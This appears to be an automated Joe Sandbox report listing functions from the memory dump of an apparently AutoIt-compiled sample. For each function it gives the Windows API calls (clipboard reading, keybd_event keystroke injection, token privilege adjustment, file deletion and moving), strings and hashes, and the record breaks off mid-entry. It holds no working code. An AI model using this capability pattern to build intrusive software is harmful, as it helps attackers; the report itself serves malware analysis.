GetKeyState.USER32(00000011), ref: 00DFF7C4
GetKeyState.USER32(00000009), ref: 00DFF7D1
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00DFF7E7
GetKeyState.USER32(00000010), ref: 00DFF7F1
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00DFF820
SendMessageW.USER32 ref: 00DFF843
SendMessageW.USER32(?,00001030,?,00DFDE69), ref: 00DFF940
SetCapture.USER32(?), ref: 00DFF970
ClientToScreen.USER32(?,?), ref: 00DFF9D4
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00DFF9FA
ReleaseCapture.USER32 ref: 00DFFA05
GetCursorPos.USER32(?), ref: 00DFFA3A
ScreenToClient.USER32(?,?), ref: 00DFFA47
SendMessageW.USER32(?,00001012,00000000,?), ref: 00DFFAA9
SendMessageW.USER32 ref: 00DFFAD3
SendMessageW.USER32(?,00001111,00000000,?), ref: 00DFFB12
SendMessageW.USER32 ref: 00DFFB3D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00DFFB55
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00DFFB60
GetCursorPos.USER32(?), ref: 00DFFB81
ScreenToClient.USER32(?,?), ref: 00DFFB8E
GetParent.USER32(?), ref: 00DFFBAA
SendMessageW.USER32(?,00001012,00000000,?), ref: 00DFFC10
SendMessageW.USER32 ref: 00DFFC40
ClientToScreen.USER32(?,?), ref: 00DFFC96
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00DFFCC2
SendMessageW.USER32(?,00001111,00000000,?), ref: 00DFFCEA
SendMessageW.USER32 ref: 00DFFD0D
ClientToScreen.USER32(?,?), ref: 00DFFD57
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00DFFD87
GetWindowLongW.USER32(?,000000F0), ref: 00DFFE1C

Strings

@GUI_DRAGID, xrefs: 00DFF99D
F, xrefs: 00DFFD13

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3461372671-4164748364
Opcode ID: 64859f525336e8d7cb92dd7e8e3b40b10d05731ddf04f7d2b203fa27f7662ba6
Instruction ID: 08a1b2020d8ffe25392dfa9a0fcf9ddd32fdc7e30e93d93da90b85d4a3d30b66
Opcode Fuzzy Hash: 64859f525336e8d7cb92dd7e8e3b40b10d05731ddf04f7d2b203fa27f7662ba6
Instruction Fuzzy Hash: FA329A70204209AFD724DF24C884BBABBE5FF48354F198A29F695D72A1DB71DD04CB61

Function 00DFA8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00DFAFDB

Strings

%d/%02d/%02d, xrefs: 00DFAD0A

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 448d462825c7f7c425b67a56573d98c2837aaf2083fd52ef4e605887af0c18cd
Instruction ID: 336c8c5b89b9409d6e5014677bbf359afccef8392c54c401869bd85408247a4b
Opcode Fuzzy Hash: 448d462825c7f7c425b67a56573d98c2837aaf2083fd52ef4e605887af0c18cd
Instruction Fuzzy Hash: DB12B0B1504208AFEB258F69CC49FBE7BB8EF45310F158219F65AEB291DB708945CB31

Function 00DAF78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 00DAF796
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E04388
IsIconic.USER32(000000FF), ref: 00E04391
ShowWindow.USER32(000000FF,00000009), ref: 00E0439E
SetForegroundWindow.USER32(000000FF), ref: 00E043A8
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E043BE
GetCurrentThreadId.KERNEL32 ref: 00E043C5
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00E043D1
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00E043E2
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00E043EA
AttachThreadInput.USER32(00000000,?,00000001), ref: 00E043F2
SetForegroundWindow.USER32(000000FF), ref: 00E043F5
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E0440A
keybd_event.USER32(00000012,00000000), ref: 00E04415
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E0441F
keybd_event.USER32(00000012,00000000), ref: 00E04424
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E0442D
keybd_event.USER32(00000012,00000000), ref: 00E04432
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E0443C
keybd_event.USER32(00000012,00000000), ref: 00E04441
SetForegroundWindow.USER32(000000FF), ref: 00E04444
AttachThreadInput.USER32(000000FF,?,00000000), ref: 00E0446B

Strings

Shell_TrayWnd, xrefs: 00E04383

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 0a74f5fc3243ce7725824a55538b7f52bd0f0ddeb31e164ba713c53f2a3280b2
Instruction ID: d9c68e5bb66995d71807876bb1240ce847488818fc9365ef21649d0f51f4428d
Opcode Fuzzy Hash: 0a74f5fc3243ce7725824a55538b7f52bd0f0ddeb31e164ba713c53f2a3280b2
Instruction Fuzzy Hash: 653181B1A44218BFEB216F729C49FBF3E6DEB44B54F108025FB05BA1D1C6B05D40AAA0

Function 00DD6B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00D931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D931DA

Part of subcall function 00DD7B9F: __wsplitpath.LIBCMT ref: 00DD7BBC
Part of subcall function 00DD7B9F: __wsplitpath.LIBCMT ref: 00DD7BCF

Part of subcall function 00DD7C0C: GetFileAttributesW.KERNEL32(?,00DD6A7B), ref: 00DD7C0D

_wcscat.LIBCMT ref: 00DD6B9D
_wcscat.LIBCMT ref: 00DD6BBB
__wsplitpath.LIBCMT ref: 00DD6BE2
FindFirstFileW.KERNEL32(?,?), ref: 00DD6BF8
_wcscpy.LIBCMT ref: 00DD6C57
_wcscat.LIBCMT ref: 00DD6C6A
_wcscat.LIBCMT ref: 00DD6C7D
lstrcmpiW.KERNEL32(?,?), ref: 00DD6CAB
DeleteFileW.KERNEL32(?), ref: 00DD6CBC
MoveFileW.KERNEL32(?,?), ref: 00DD6CDB
MoveFileW.KERNEL32(?,?), ref: 00DD6CEA
CopyFileW.KERNEL32(?,?,00000000), ref: 00DD6CFF
DeleteFileW.KERNEL32(?), ref: 00DD6D10
FindNextFileW.KERNEL32(00000000,00000010), ref: 00DD6D37
FindClose.KERNEL32(00000000), ref: 00DD6D53
FindClose.KERNEL32(00000000), ref: 00DD6D61

Strings

\*.*, xrefs: 00DD6B8C, 00DD6B9B, 00DD6BB9

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
String ID: \*.*
API String ID: 1867810238-1173974218
Opcode ID: f93d9f848482a8e832dc07f6877de24d4ebff1f2bb862e229c6854e615bec63b
Instruction ID: 876ff8a25bd26390f239fa89c082a1cc55cf57c5effaa4dac5b9bc942647c609
Opcode Fuzzy Hash: f93d9f848482a8e832dc07f6877de24d4ebff1f2bb862e229c6854e615bec63b
Instruction Fuzzy Hash: F5511D7290426CAACF21DBA09C44EEE777DAB09300F4845D7E559A2151EB34DB8CCFB1

Function 00DE7099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00E2DBF0), ref: 00DE70C3
IsClipboardFormatAvailable.USER32(0000000D), ref: 00DE70D1
GetClipboardData.USER32(0000000D), ref: 00DE70D9
CloseClipboard.USER32 ref: 00DE70E5
GlobalLock.KERNEL32(00000000), ref: 00DE7101
CloseClipboard.USER32 ref: 00DE710B
GlobalUnlock.KERNEL32(00000000), ref: 00DE7120
IsClipboardFormatAvailable.USER32(00000001), ref: 00DE712D
GetClipboardData.USER32(00000001), ref: 00DE7135
GlobalLock.KERNEL32(00000000), ref: 00DE7142
GlobalUnlock.KERNEL32(00000000), ref: 00DE7176
CloseClipboard.USER32 ref: 00DE7283

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: ffdc8279a0572a2fa9e7b5f0abbdba1c5a74bcd7a81ddc21afdf4184b5186a7b
Instruction ID: 7cbdfadc8ec1da5c07524fad06b8488820d3142e41068fec568ef32e5f4d8a72
Opcode Fuzzy Hash: ffdc8279a0572a2fa9e7b5f0abbdba1c5a74bcd7a81ddc21afdf4184b5186a7b
Instruction Fuzzy Hash: 7151BE31208301AFD751FF62DC96FAE77A8EB84B11F048529F656E21E1DB70D9088B72

Function 00DCB9F1 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 00DCBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DCBF0F
Part of subcall function 00DCBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DCBF3C
Part of subcall function 00DCBEC3: GetLastError.KERNEL32 ref: 00DCBF49

_memset.LIBCMT ref: 00DCBA34
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00DCBA86
CloseHandle.KERNEL32(?), ref: 00DCBA97
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00DCBAAE
GetProcessWindowStation.USER32 ref: 00DCBAC7
SetProcessWindowStation.USER32(00000000), ref: 00DCBAD1
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00DCBAEB

Part of subcall function 00DCB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DCB9EC), ref: 00DCB8C5
Part of subcall function 00DCB8B0: CloseHandle.KERNEL32(?,?,00DCB9EC), ref: 00DCB8D7

Strings

winsta0, xrefs: 00DCBAA9
, xrefs: 00DCBA43
default, xrefs: 00DCBAE6

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 3358a26f225a63769583ac67e4505d70786f3acc68018990c6714f4175b626cb
Instruction ID: fde45e26c2981e63051553b202f983c55af9a709e0239c0a6f2933b3387017a0
Opcode Fuzzy Hash: 3358a26f225a63769583ac67e4505d70786f3acc68018990c6714f4175b626cb
Instruction Fuzzy Hash: 1E81497190020AAEDF119FA4CD46EEEBBB9EF08324F18851AF915B7160DB31CE159B31

Function 00DDFDD2 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00DDFE03
FindClose.KERNEL32(00000000), ref: 00DDFE57
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DDFE7C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00DDFE93
FileTimeToSystemTime.KERNEL32(?,?), ref: 00DDFEBA
__swprintf.LIBCMT ref: 00DDFF06
__swprintf.LIBCMT ref: 00DDFF3F

Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F

__swprintf.LIBCMT ref: 00DDFF93

Part of subcall function 00DB234B: __woutput_l.LIBCMT ref: 00DB23A4

__swprintf.LIBCMT ref: 00DDFFE1
__swprintf.LIBCMT ref: 00DE0030
__swprintf.LIBCMT ref: 00DE007F
__swprintf.LIBCMT ref: 00DE00CE

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00DDFF00
%02d, xrefs: 00DDFF88, 00DDFF91, 00DDFFDF, 00DE002E, 00DE007D, 00DE00CC
%4d, xrefs: 00DDFF39

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 108614129-2428617273
Opcode ID: c2c66b325404fc4e726e4020068d7e955b5a1709f38ed6e2ccba5a8e8b818373
Instruction ID: c980b4c018060b0c9c7020363f6bd29fda4ef8e9ce5ab92ac3b4532385fa997f
Opcode Fuzzy Hash: c2c66b325404fc4e726e4020068d7e955b5a1709f38ed6e2ccba5a8e8b818373
Instruction Fuzzy Hash: 43A10BB2408344ABC711EFA5C885DABB7ECEF95700F44492EF596C6151EB34EA48CB72

Function 00DE2044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00DE2065
_wcscmp.LIBCMT ref: 00DE207A
_wcscmp.LIBCMT ref: 00DE2091
GetFileAttributesW.KERNEL32(?), ref: 00DE20A3
SetFileAttributesW.KERNEL32(?,?), ref: 00DE20BD
FindNextFileW.KERNEL32(00000000,?), ref: 00DE20D5
FindClose.KERNEL32(00000000), ref: 00DE20E0
FindFirstFileW.KERNEL32(*.*,?), ref: 00DE20FC
_wcscmp.LIBCMT ref: 00DE2123
_wcscmp.LIBCMT ref: 00DE213A
SetCurrentDirectoryW.KERNEL32(?), ref: 00DE214C
SetCurrentDirectoryW.KERNEL32(00E43A68), ref: 00DE216A
FindNextFileW.KERNEL32(00000000,00000010), ref: 00DE2174
FindClose.KERNEL32(00000000), ref: 00DE2181
FindClose.KERNEL32(00000000), ref: 00DE2191

Strings

*.*, xrefs: 00DE20F7

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: e70387f464ea164f6125d180804d7e4ade41fdae1d43d0b7e3c5be65ca6ae3aa
Instruction ID: b796e72a6fa9e00d2d42d02425a369fcf884a42b8339986e9786e47063e448b7
Opcode Fuzzy Hash: e70387f464ea164f6125d180804d7e4ade41fdae1d43d0b7e3c5be65ca6ae3aa
Instruction Fuzzy Hash: D731BD32A05359BECB14AFB6EC49EEE73AC9F49320F144056E915F2090DB70DB48CA75

Function 00DFF122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfilenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E

DragQueryPoint.SHELL32(?,?), ref: 00DFF14B

Part of subcall function 00DFD5EE: ClientToScreen.USER32(?,?), ref: 00DFD617
Part of subcall function 00DFD5EE: GetWindowRect.USER32(?,?), ref: 00DFD68D
Part of subcall function 00DFD5EE: PtInRect.USER32(?,?,00DFEB2C), ref: 00DFD69D

SendMessageW.USER32(?,000000B0,?,?), ref: 00DFF1B4
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00DFF1BF
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00DFF1E2
_wcscat.LIBCMT ref: 00DFF212
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00DFF229
SendMessageW.USER32(?,000000B0,?,?), ref: 00DFF242
SendMessageW.USER32(?,000000B1,?,?), ref: 00DFF259
SendMessageW.USER32(?,000000B1,?,?), ref: 00DFF27B
DragFinish.SHELL32(?), ref: 00DFF282
NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00DFF36D

Strings

@GUI_DRAGFILE, xrefs: 00DFF31C
@GUI_DRAGID, xrefs: 00DFF2E1
@GUI_DROPID, xrefs: 00DFF2A2

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 2166380349-3440237614
Opcode ID: 8af0d3e272ec3b08273a255a9252d9dbbbe75b7539426f13da531b2f34a69f84
Instruction ID: c1f90115c273e8f669e834fa34ae0b3c717294add7b45aeffed488f2aa388a80
Opcode Fuzzy Hash: 8af0d3e272ec3b08273a255a9252d9dbbbe75b7539426f13da531b2f34a69f84
Instruction Fuzzy Hash: F9615A71508304AFC711EF65DC85EABBBE8FF89750F004A1DF695A21A1DB709A09CB62

Function 00DE219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00DE21C0
_wcscmp.LIBCMT ref: 00DE21D5
_wcscmp.LIBCMT ref: 00DE21EC

Part of subcall function 00DD7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00DD7621

FindNextFileW.KERNEL32(00000000,?), ref: 00DE221B
FindClose.KERNEL32(00000000), ref: 00DE2226
FindFirstFileW.KERNEL32(*.*,?), ref: 00DE2242
_wcscmp.LIBCMT ref: 00DE2269
_wcscmp.LIBCMT ref: 00DE2280
SetCurrentDirectoryW.KERNEL32(?), ref: 00DE2292
SetCurrentDirectoryW.KERNEL32(00E43A68), ref: 00DE22B0
FindNextFileW.KERNEL32(00000000,00000010), ref: 00DE22BA
FindClose.KERNEL32(00000000), ref: 00DE22C7
FindClose.KERNEL32(00000000), ref: 00DE22D7

Strings

*.*, xrefs: 00DE223D

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: b3748baf22ab682651f74481cc98c4081abfb795cbab352a31269855a318eda2
Instruction ID: 40284b1368383c1008cdbac3f86769cd0a4c8e6d121dece28cea652ca3f261bf
Opcode Fuzzy Hash: b3748baf22ab682651f74481cc98c4081abfb795cbab352a31269855a318eda2
Instruction Fuzzy Hash: D3311432905359BECF10EFA5EC49EEE33AC9F45320F144155EA14F2090DB30DA88CA79

Function 00D96BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D96C22
_memmove.LIBCMT ref: 00D96D9A

Strings

], xrefs: 00D96C04
\, xrefs: 00D96BEE
\, xrefs: 00D96C8B
\, xrefs: 00E10A25
[, xrefs: 00D96C82
Q\E, xrefs: 00D97548
^, xrefs: 00D96BFB

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _memmove_memset
String ID: Q\E$[$\$\$\$]$^
API String ID: 3555123492-286096704
Opcode ID: 1519374931def30d64bcd9dac016698495934b220cfbfd81bbb21530ba99ee36
Instruction ID: 00ff62d918f8ac293b7f936ed27170654ce1d5caf26c685eb74f16262cdfe5c5
Opcode Fuzzy Hash: 1519374931def30d64bcd9dac016698495934b220cfbfd81bbb21530ba99ee36
Instruction Fuzzy Hash: 58728C71E042199BDF24CF98C8906EDBBB1FF49314F2881A9D855BB281D774EE81DB60

Function 00DFECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DFED0C
GetFocus.USER32 ref: 00DFED1C
GetDlgCtrlID.USER32(00000000), ref: 00DFED27
